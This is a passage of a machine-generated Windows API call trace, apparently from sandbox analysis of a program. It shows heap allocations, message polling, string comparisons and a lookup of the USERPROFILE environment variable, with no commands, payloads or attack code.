[0220.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R_MajVPhj", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0220.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_MajVPhj", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MajVPhj", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0220.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ajVPhj", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.875] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jVPhj", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0220.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0220.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0220.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0220.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0220.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0220.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0220.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0220.875] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0220.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0220.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0220.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0220.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0220.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0220.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0220.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0220.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0220.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0220.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0220.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0220.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0220.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0220.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0220.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0220.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0220.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1c) returned 0x2a77f08 [0220.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0220.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uhe R_MajVPhj", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="he R_MajVPhj", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e R_MajVPhj", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0220.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" R_MajVPhj", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0220.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R_MajVPhj", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_MajVPhj", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0220.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MajVPhj", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ajVPhj", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0220.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0220.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0220.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0220.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0220.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0220.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0220.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0220.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0220.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0220.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0220.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0220.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0220.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69a30 | out: hHeap=0x2af0000) returned 1 [0220.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0220.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0220.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0220.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0220.877] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0220.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0220.877] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0220.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0220.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0220.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0220.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ac8 [0220.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0220.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0220.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0220.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0220.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0220.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0220.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0220.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0220.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0220.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0220.878] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0220.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0220.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0220.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaff0 [0220.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0220.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0220.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaeb8 [0220.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0220.878] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0220.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0220.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0220.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0220.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0220.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0220.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0220.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0220.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0220.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0220.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0220.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0220.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0220.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0220.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0220.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0220.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0220.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38541a0 [0220.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0220.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0220.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0220.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0220.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0220.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0220.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0220.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0220.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0220.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0220.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0220.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a08 [0220.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0220.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0220.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0220.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0220.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0220.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0220.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0220.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0220.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0220.881] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0220.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0220.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0220.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab050 [0220.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0220.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0220.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab038 [0220.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0220.881] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0220.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0220.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0220.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0220.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0220.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0220.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0220.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0220.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0220.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0220.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0220.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0220.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0220.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0220.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0220.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0220.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38546c8 [0220.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0220.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0220.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0220.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0220.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0220.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0220.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0220.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719f8 [0220.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0220.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0220.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0220.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0220.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b38 [0220.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0220.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0220.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0220.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab008 [0220.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0220.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0220.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0220.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0220.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0220.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0220.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0220.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0220.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0220.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0220.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0220.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0220.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0220.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0220.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0220.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0220.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0220.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0220.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0220.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0220.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0220.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0220.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0220.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0220.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0220.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0220.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0220.884] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0220.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0220.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0220.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0220.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0220.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0220.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0220.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0220.884] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0220.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0220.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0220.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0220.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0220.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0220.885] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0220.885] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0220.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0220.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0220.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0220.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0220.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0220.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0220.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0220.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0220.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0220.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0220.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 